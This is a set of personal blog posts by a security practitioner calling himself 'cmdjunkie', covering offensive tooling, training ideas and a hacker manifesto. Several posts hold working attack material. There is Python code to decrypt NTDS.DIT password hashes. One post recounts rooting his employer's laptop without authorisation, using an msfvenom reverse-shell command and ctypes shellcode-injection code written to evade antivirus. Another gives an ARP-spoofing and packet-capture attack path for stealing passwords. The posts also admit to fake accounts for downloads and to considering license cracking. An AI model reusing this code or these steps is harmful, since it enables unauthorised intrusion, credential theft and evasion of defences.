Decrypting NTDS.DIT Passwords
cmdjunkie
In order to decrypt a hash stored in NTDS.DIT the following steps are necessary:
1. decrypt the PEK (Password Encryption Key) with bootkey (RC4 – layer 1)
2. hash decryption first round (with PEK and RC4 – layer 2)
3. hash decryption second round (DES – layer 3)
---
Here is the python algorithm that can be used to decrypt the PEK key after one has obtained the bootkey (bootkey can be collected from the SYSTEM registry hive and the method is well documented):
md5=MD5.new()
md5.update(bootkey)
for i in range(1000):
md5.update(enc_pek[0:16])
rc4_key=md5.digest();
rc4 = ARC4.new(rc4_key)
pek=rc4.encrypt(enc_pek[16:])
return pek[36:]
---
The first step is to remove the RC4 encryption layer. During this the PEK key and the first 16 bytes of the encrypted hash is used as key material for the RC4 cypher. Below is the structure of the 40 bytes long encrypted hash value stored in the NTDS.DIT database.
header 8 bytes key material for RC4 16 bytes encrypted hash 16 bytes
The algorithm to remove the RC4 encryption layer is the following:
md5 = MD5.new()
md5.update(pek)
md5.update(enc_hash[0:16])
rc4_key = md5.digest();
rc4 = ARC4.new(rc4_key)
denc_hash = rc4.encrypt(enc_hash[16:])
---
The final step is to remove the DES encryption layer which is in fact very similar to the so called “standard” SYSKEY encryption used in case of password hashes stored in the registry. Below is the last part of the algorithm:
(des_k1,des_k2) = sid_to_key(rid)
d1 = DES.new(des_k1, DES.MODE_ECB)
d2 = DES.new(des_k2, DES.MODE_ECB)
hash = d1.decrypt(denc_hash[:8]) + d2.decrypt(denc_hash[8:])

Exfiltration Tester
cmdjunkie
Rooting my Work Laptop

It’s not that I don’t like my job; I just find it painfully political, and full of god awful red tape.  I was brought on to spear-head Incident Response as some Senior, but alas, I have no power, pull, or influence.  Now, I suppose I could wait, bide my time, and hope that slowly, I’ll gain their trust and be able to my job the right way, but I really don’t have the patience for that.  Besides, I have a much better opportunity waiting for me (I only hope the on-boarding process goes as smooth as I’d like to).

Anyway… In the few weeks that I was there ( I started the short week of thanksgiving) , I began poking around the network and found some significant vulnerabilities.  For one, they use Trend Micro, and Trend Micro is notorious for being a shitty AV solution.  A couple of years ago (2013), you could get around it simply by encoding your payload with shikata_ga_nai.  They’ve upped their defenses and signatures, but Trend still sucks IMHO.

Anyway, the network of the enterprise is completely flat, in that reachability is all but 90% or above throughout the network from anywhere on the network.  Systems are mostly Windows based and client side vulnerabilities aren’t patched on a consistent basis.   Egress policy is a deny all with exceptions.  Up until last Friday, outbound FTP was allowed.  Proxy communication configuration is flawed as it doesn’t require credentials, just for requests to be pointed at the proxy.  Inbound email allows HTML to be rendered in the Outlook client, which makes Phishing extremely easy.

The workstations themselves are standard Windows 7 builds with TM installed.  The local admin user is “Desktop”.  This should work on all workstations throughout the network.  My first task is to get the password for the Desktop account.  Naturally, I searched the local file system and the network shares for files containing the word ‘password’.  Results were inconclusive.

I needed to root the box, so I went to MSF to generate a reverse shell payload.  I tried a couple of different encoded payloads.  Even after using a combo of three different encoders, TM was still blocking the payload once it was dropped to the disk.  I reverted back to my favorite tool/language python, and used a trick that Justin Sietz taught me in GHP: ctypes to execute shellcode.
After dumping meterpreter shellcodeusing msfvenom:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4434 -f py


 I wrote a python script to invoke WindowsAPI calls that would allocate virtual memory, lock the address space into physical memory in order to provide a pointer to the base address of the address space, and create a thread so the shellcode can be executed.  (Thanks JS):

import ctypes
shellcode1 = bytearray("<shellcode>")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode1)).from_buffer(shellcode1)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(shellcode1)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

As a standalone Python script, it works like a charm and a meterpreter shell is spawned.  Running it from my work laptop succeeds without alarming that pesky TM service.  Good deal.  :D
But there’s a problem.  Windows 7 and above doesn’t let you use getsystem to escalate privileges.  I have to find other ways around that to dumphashes.  My options are to run mimikatz, download wce.exe (or upload it), or steal application passwords and hope they’re used more than once.
Off the network and in the home lab, I don’t have the luxury of testing stolen tokens, so I’ll save that for Monday morning.
When you have access to a box via a meterperter shell and you’re looking for a way to escalate privileges, look to the local applications installed.  ‘getsystem’ should be the first command ran.  Meterpreter will try all three methods to get system access, but newer operating systems fail (Win7+) trying this.  The next step is to enumerate installed applications.  This can be done with a wmic command:
$ wmic product get name
It takes a minute to generate the list, but it’s worth it.  Use it to find a vulnerable application to escalate privileges.  Initially, focus on the big targets (Adobe, Java, IE, FF) and work backwards.  There may be a way to quickly cross-reference this list with an exploit database to quickly identify potential targets.
I’ve hit a soft road-block, but I ain’t worried about it.  It’ll come to me, it always does.

Nationalists of a New Millennium
cmdjunkie
Despite the fact that my day was filled with pointless, time-consuming meetings, I actually got some interesting code written today.  I updated the AIC module with a lot of new content and actually completely the much needed search function.  I added a copy button that will put the content of the description frame into the clipboard for quick editing and execution.  This is important because I imported the (incomplete) contents of the OSS module into AIC.  I think its better this way because it’s a central resource for all offensive activity and engagements.

The search function was easily the feature that needed to be implemented.  Without it, it does not speak to the AIC Rule “Optimization is Key”.  If you have to browse through something and drill down to look for something you know you need, there’s room for operationalization. In one of my lame meetings this morning I updated my Nest.py module.  It’s a nifty little piece of code that allows you to copy in a list of IPs which then opens up each one in a browser, attempting to access its web server.  This will come in handy when scanning for web services and trying to figure out what they hell they’re running.  There are tools to do this, but hell, I write my own shit.  Fuck all you hoes.

The next steps for the AIC module are to build in the test/quiz/training feature so one can be drilled on procedures and techniques.  I want to implement a timing system as well so each move can be measured and tracked over time.  That way you know you’re getting better and faster the more you practice and instill the techniques into your muscle memory.

Finally, I was granted membership into the AZ Cyber Range today.  I imagine it will be similar to my home lab, only much larger and more robust.  The AZ Cyber Range also has a competition once a week, that of which I’ll certainly be getting myself into.  The time is now.

“This is our world now... the world of the electron and the
switch, the beauty of the baud. We make use of the service already
existing without paying for what could be dirt-cheap if it wasn't run by
profiteering gluttons, and you call us criminals. We explore... and you
call us criminals. We seek after knowledge, and you call us criminals.
We exist without skin color, without nationality, without religious
bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and
lie to us and try to make us believe it's for our own good, yet we're the
criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look
like. My crime is that of outsmarting you, something you will never
forgive me for.
I am a Hacker, and this is my manifesto. You may stop this
individual, but you can't stop us all. After all... we're all alike.”

The world has changed and the new manifesto needs to written.  Not from a curious teenage hacker’s perspective, but from the perspective of that teenage hacker that grew up in the age of information, terrorism, and audacious deception.

We are the ones with the power.  We are the ones who control the systems you depend on.  This is our world now.  No longer do we crave access and information, we control access and information.  You lie to us, beat us down, discriminate against us, pigeonhole us, call us criminals and unjustly take lethal action against us.  We, are a sleeping giant, tucked away in the confines of our domiciles, waiting for a target.

--
Also don’t forget the AIC Ticker.

Streets Ahead - AIC
cmdjunkie
  I made some significant steps forward in AIC training and development over the last couple of days.  I seem to work in bursts of creativity/motivation because I haven't been this productive all summer.  I digress.

The first bit of code I wrote a couple of days ago is a script (feedwrapper.py) that automates the collection and publication of security headlines to my site.  The resources being accessed are publicly available RSS feeds that are simply retrieved, organized and posted to the links page of the site.  This action occurs every morning right around the time I get up --ready to read the latest of course.  Further, I'd like to separate out the link collection by type and possibly implement different update intervals each type (e.g. vulns get updated hourly, etc.).  For now this will work as a centralized location for my daily digest.

Once I started thinking about what my daily digest should consist of, I tracked down an old cronjob I used to have configured on an old linux host of mine.  It would fire in the mornings and hit my inbox with something to watch, something to read, and a tool to play with.  I have some aspirations of turning it into my CIDST training script, but my students lost interest early on and I went back to the drawing board.

That old training email cron job worked out perfectly for a daily reminder to maintain a continous learning habit.  I simply converted the output method from email to HTML page construction. Naturally this lead me to visualizing what the training room would consist of and I began to build that out.  (more on that later).

When I recognized that I needed a quicker way to create web pages from my existing template, I decided to modularize page creation, view, and upload functions so I could make quick additions to the site as needed.  The code works great, it just needs an upload function and the ability to read from an external file/resource.  By the way, my Urlkel module for working with pages and links has come in extremely handy in my testing and development.

Finally, a major piece of the puzzle has been solved with my newly designed custom data structure for all OSINT content.  It came to me in a flash and I realized how the entire resource (Bazzell's Book) can be operationalized.  I began by visiting Bazzell's site and scraping out the links provided in the book.  I placed them in the structure design I set up after analyzing the content layout and now I have an interactive console that will potentially be able to execute huge collective searches on one target.  The initial goal for this collection of not-yet-fully-operationalized content is to enumerate the search query syntax for each so I can throw a single argument at a huge collection of online resources and then pilfer through the results.  This is much more effective than visiting a site manually (or even via a bookmark) -- plus I just like the idea of executing bulk searches from the CLI.

OSS Developments
cmdjunkie
Operational Security Software is a vision I have that combines operational secuirty practices with rapid software development and data visualization.  Python just happens to be the perfect language for this as its dynamic nature allows you to build out core functionality at a rapid pace, and even build a GUI in real-time.  Python provides the perfect technology to build an interactive offensive and defensive security framework to use in all disciplines of Adversarial Informatics Combat.

Python is an elegant language, and because of this, many tasks can be completed in very few lines of code.  This means for almost any aspect of R&B teaming can be condensed into a script, or even a highly cohesive module of methods that accomplish complicated tasks in real-time.  With this theory in mind, I've been collecting and organizing code examples from a variety of resources with intentions of integrating the collection into the AIC module (after I complete the search functionality).  I believe such a collection of searchable code will be extremely beneficial in practice, on the job, and in the field.

Most of the best code examples come from the textbooks.  I simply download the freely available code and learn by example.  Who has time to read the books these days anyway?  Currently the OSS collection includes the source code from:

  • Black Hat Python (100%)

  • Gray Hat Python (100%

  • Offensive Countermeasures (all the Python code)

  • SPSE Training Course (100%)

  • Understanding Network Hacks (just started importing)

I hopped onto PackT publishing's website and created a fake profile so I could download more source.  Their selection of books is quiet impressive to say the least.  While I don't think it's all required reading material, the code examples are excellent and should be explored.  I'll be importing the source code of the following books into the repo:


  • Python Penetration Testing Essentials

  • Python High Performance Programming

  • Python for Secret Agents

  • Building Maching Learning Systems with Python

  • Python Network Programming Cookbook

  • Python Data Visualization Cookbook

  • Python Web Penetration Testing Cookbook                

I might remove the Machine Learning Systems, but I feel like the examples will apply to Security Engineering Science in the near future -- it's just a matter of time.  In fact, Security Engineering Science will come out of Big Data and the birth of the Security Data Scientist.

There's something to be said about having all of that instantly usable code at your fingertips.  The ability to quickly pull up and adapt workable source will eventually be criticial to success in the field of battle.  I say this because I realize that the power is in the plan.

This is essentially the core philosophy of AIC.

--edit

I also realized that I can start to design my operational training activities around the existing outline that exists in the AIC module itself.  For one, it's in logical order (as I designed it that way) so you can step through each process of a test or task in order.  Which also reminds me of something else I can add to the functionality.  Because one of my main goals is to develop a training regiment, I should implement a training mode in the module that incorporates a timeclock/procedure feature that can track your speed and progress through things like "Post Ex" procedures.  This promotes one of the core philosophies of AIC -- that system and network navigation should be second nature.  I will integrate the timeclock I wrote for tracking my time at work into the module. 

Weekend Theoretical Ramblings
cmdjunkie
Yesterday evening I meditated in the middle of my office, right after a workout.  It was relieving, impromptu and unprecedented, and left me clear minded for the rest of the night.  During the meditation my mind would wander, eventually leading up to a breakthrough or idea based on my most recent encounters and development in my research and tradecraft.  (For some reason I want to call it cyber tradecraft, but I think that's ridiculous.)  It became a common occurrence.  In attempts to clear my thoughts, I would more or less hyper-focus on the problems I encountered during the day and formulate a rather elegant solution or two.  That's when I grabbed a legal pad.  This brought me to two revelations: one, it makes me realize I'm far to overstimulated to solve problems like I used to, and two, I need shut down everything and meditate (solve problems) like this more often.

It's important to let your mind clear and consequently work out the issues you're presently plagued with.  I remember reading that most hacking occurs away from the keyboard.  I believe this more now than I ever have.  Hacking occurs when an idea is conjured up, written down, scratch-a-napkin designed, and eventually implemented at 1am after a couple pints and a rowdy good time at the local pub.  Hacking is creatively coming to a conclusion (or solution) after trudging over a problem for weeks, to only have it come to you in the shower a couple of days before it's due.

These days I've learned to operationalize my activities.  "Offensive Operationalization", is what I should call it.  It's the practice of treating offensive security as an abstract adversarial sport with fields (networks), moves (attacks), combos (chained attacks), and enhancers (scripts/automation).

Network Security and Penetration testing can be broken down into multiple categories and phases.  There are tools and procedures that coincide with each phase in order to perform the necessary steps to acquire the critical information.  Every phase in the penetration testing cycle has a key deliverable.  These key deliverables should be the primary focus of each step, mainly to keep things simple and focused.  The better focused one is on the goal at hand, the easier it will be to accomplish the goal.  This relates back to the idea that the majority of hacking is performed away from the keyboard.  Once you touch the keyboard, you should already know exactly what it is you're about to do.  Training, reps, and drilling home AIC concepts will allow one to adapt in environments when plans are deviated by outside sources.

Newbies
cmdjunkie
Neumonics for the PENTRN process

#Daily Learns

[+] Use the 'which' command in NIX to identify the full path of executables in the $PATH environment variable.

---%---

Operation Prince of Pima

Attack Path
---------------
Access to the Wireless AP pw: inthe*****
MITM of Host on the network ettercap -T -M arp:oneway,remote /target1/ /target2/
Capture MITM traffic content tcpdump -i eth0 -XX host [target]
Capture cleartext password packets tcpdump -vvXX -i eth0 host 192.168.1.134 -w newcapture.pcap
Extract the password strings strings newcapture.pcap | grep "os_username"
//Someone uses the same password for everything.  Developers are stupid like that.
//Find someone that has their primary password the same as their work passwords.
Find a way to log someone out, based on the capture of their JSESSIONID:
[184.169.157.202]:8080

Tools and the Tetris Effect
cmdjunkie
 I recently downloaded Parrot 1.9  to test out.  It's an alternative to Kali.  It could be interesting.

Instead of using EasyIDS, I'm looking into SmoothSec 3.4.1 in the virtual lab.  Also, the virtual lab's license key is about to expire.  I need to either crack it, find a key online, or roll back the install.

Web2Py was also downloaded this morning.  I have some limited experience ripping it apart and looking at source, but I haven't built anything with it.  My boss and one of my co-workers don't like it.  I don't have a reason not to like it yet so I'll hold off on judging it.

---

Using the authNotify.py failed authentication notifier I built last summer, I'm going to put together an automated daily training program that will randomly generate daily objectives to promote continuous learning.  The daily emails will be fired off at 6am and will include the following:

  • Something to read

  • Something to watch

  • A tool to learn, play with

  • A recon/enumeration assignment

  • A coding assignment

All of this came about when I was driving in this morning listening to the audio of a youtube video.  I became frustrated because what I was listening to is not what I'm interesting in learning and expanding upon right now.  That's when it hit me, you listen to and watch videos to either A) improve understanding of concept(s) you're unfamiliar with or B) introduce yourself to new areas you haven't explored.

There's so much media and content readily available, it comes back to the individual, and what they want to focus on.  For example, I know that I could brush up on my crypto knowledge, so I should listening to more Crypto talks and vids.  Saturation is a good thing -- to an extent.

Repetition Training
cmdjunkie
Before I head out, I'm tossing around ideas of implemetning this in SL4A, or whatever the hell it's called now.  I'd like voice rec, but starting off, I don' think it'll need it.  It'll be interesting to test, however.


#Module contains Stimulus and Syntax (S&S), lists, and procedures
#############################################################

#OSINT
[List] List 10 reliable sources for OSINT data recon when researching an individual.
[List] List 10 reliable sources for OSINT data recon when researching an organization.


#Enumeration
[S&S] Syntax for ping sweep
[S&S] Syntax for TCP scan, & when and why to use it
[S&S] Syntax for SCTP scan & when and why to use it
[S&S] Syntax for UDP scan & when and why to use it
[S&S] Syntax for Maimon scan & when and why to use it
[S&S] Syntax for Idle scan & when and why to use it
[S&S] Syntax for ACK scan & when and why to use it
[S&S] Syntax for SYN scan & when and why to use it
[S&S] Syntax for Window scan & when and why to use it
[S&S] Syntax for FIN scan & when and why to use it
[S&S] Syntax for NULL scan & when and why to use it
[S&S] Syntax for XMAS scan & when and why to use it
[List] List 12 services to immediately scan for when assessing a new network


#Access/Exploitation
[Proc] Detail the steps for pivoting from a compromised machine
[List] Name 3 common vulnerabilities with exploits for OpenSSH
[List] Name 3 common vulnerabilities with exploits for Apache
[List] Name 3 common vulnerabilities with exploits for IE
[List] Name 3 common vulnerabilities with exploits for Mozilla Firefox
[List] Name 3 common vulnerabilities with exploits for Chrome
[List] Name 3 common vulnerabilities with exploits for Windows
[List] Name 3 common vulnerabilities with exploits for UbuntuServer
[List] Name 3 common vulnerabilities with exploits for any FTP package
[List] Name 3 common vulnerabilities with exploits for IIS

#PostExploitation
[S&S] Syntax for adding a user on windows
[S&S] Syntax for adding a user on linux
[S&S] Syntax for natively cycling through a file on windows (FOR loop)
[S&S] Syntax for natively cycling through a file on linux (FOR loop)

Adversarial Informatics (Revisiting the Program)
cmdjunkie
#Adversarial Informatics
'''
I want to find the quickest, easiest way of performing these actions.  Wrap them up in something I call operationalization
and practice the hell out of them so they become second nature.

Pygame for Linux -> Kali -> PENTRN -> USB Game Controller for Penetration Testing engagements
    Shoulder buttons would allow you to cycle through techniques to map to an attack button.
  
A lot of experts say that to really learn how to improve your skills you need hands on training, which I agree with.
However, there's a lot to be said about the procedural nature of security work.  Yes, it's important to understand
the fundamentals of the technologies, but when you get to the point where you only want to be better and ultimately faster,
the old addage still applies; repetition is king.

The goal behind Adversarial Informatics is to devise a system that will reprogram the brain of the target to the point
where all techniques, tactics and procedures are firmly ingrained in the operatives' mind.

Adversarial Informatics students will not take the traditional route anymore.  The goal is to program them for war.
  
    [+] Flash Card Style:  Application to constantly review attacks and TTPs
      
    [+] Lab Training:  Goal-based, hands-on program
    [+] Recorded Content:  Pre-recorded or self-recorded MP3s that cover attacks, TTPs, and concepts
    [+] Syntax Matching game: pentrn_x.py  Syntax matching game that solidifies


7 Intelligences:
    Linguistic intelligence - describe the material out loud, or use question and answer format.
    Logical-mathematical intelligence - use a flowchart or diagram for the material.
    Spatial intelligence - make an image of the material.
    Musical intelligence - play background music as you learn.
    Interpersonal intelligence - teach someone else.
    Intrapersonal intelligence - ruminate on the material.
    Bodily-kinesthetic intelligence - use index cards sorted in different ways.


GOAL: "Complete Recall"

'''


In an effort to improve and develop advanced skills quickly I propose the goal oriented approach.

#Fuzzing Engines and Optimization [ GOAL:  To improve the ability to discover new vulnerabilities ]
 [Level 1] Write a remote fuzzer for a remote FTP service.  Fuzzer should enumerate all commands, test them, track crashes, and generate a report.  (30pts)
 [Level 2] Write a fuzzer using ctypes for a local PE.  Use GHP as a guide.  Fuzzer should track data entry points and crashes.                        (75pts)

#Security Visualization [ GOAL:  To ensure security data can be made consumable in a timely fashion ]
 [Level 1] Develop a framework that will take a list of hosts and an additional column of arbitrary data and graph it in an HTML page.                 (30pts)
 [Level 2] Develop a web based UI that is interactive.  Data sources vary.  Ensure the design is scalable and supports extensibility.                  (60pts)

# Pentration Testing Techniques  [ GOAL: To ensure the skills needed to locate and enumerate potential points of entry are memorized and made second nature ]
 [Level 1] Write a script that will take an argument and search all the OSINT sites in the CIDST module by opening a new window with new tabs that show the results
 [Level 1] "Still, the skill most valuable for penetration testing is the ability to locate and enumerate potential points of entry."
 [Level 1a] Operationalize the detection, service identification, and organization of common/vulnerable network services.  Solution should ensure all data is structured and searchable.  (50pts)
 [Level 2b] Develop a solution that can maintain a collection of C&P content for organization, tracking, searchability and reporting.  (60pts)
 
# Post Exploitation Training  [ GOAL:  To solidify immediate actions to take upon the compromise of an asset
 [Level 1] Pop a Win10.1 box in the lab and walk through the McCray Standard Procedure (in CIDST) (10pts/walkthrough)
 [Level 2] Master the McCray Standard Procedure so the steps can be performed by second nature      (50pts)
 [Level 2] Develop and publish your own PostEx procedures for Windows, WinServer, *nix (15pts/each)
 [Level 2a] Master each specific procedure so the steps can be performed from memory and/or by second nature (50pts)
 [Level 3] Memorize Common Persistence Techniques for Windows / Unix (50pts per OS mastered)
 
# Exploit Development [ GOAL:  To further develop the skillset to write custom exploit code for new vulnerabilities ]
 [Level 1] Identify an exploit, interpret the code and port it to a different language.  (50pts for ported code that works)
 [Level 4] Download a beginners level Crackme and develop and exploit for one of its vulnerabilities.  (100pts)



 DEFTRN
  [+]     Components of Defending
        [-] Firewalls/ACLs
        [-] IDS Systems
        [-] WAF Systems
        [-] HIDS
        [-] Open Source Tools
  [+]   Incident Response / Digital Forensics
  [+]     Hunting / IoC Detection

?

Log in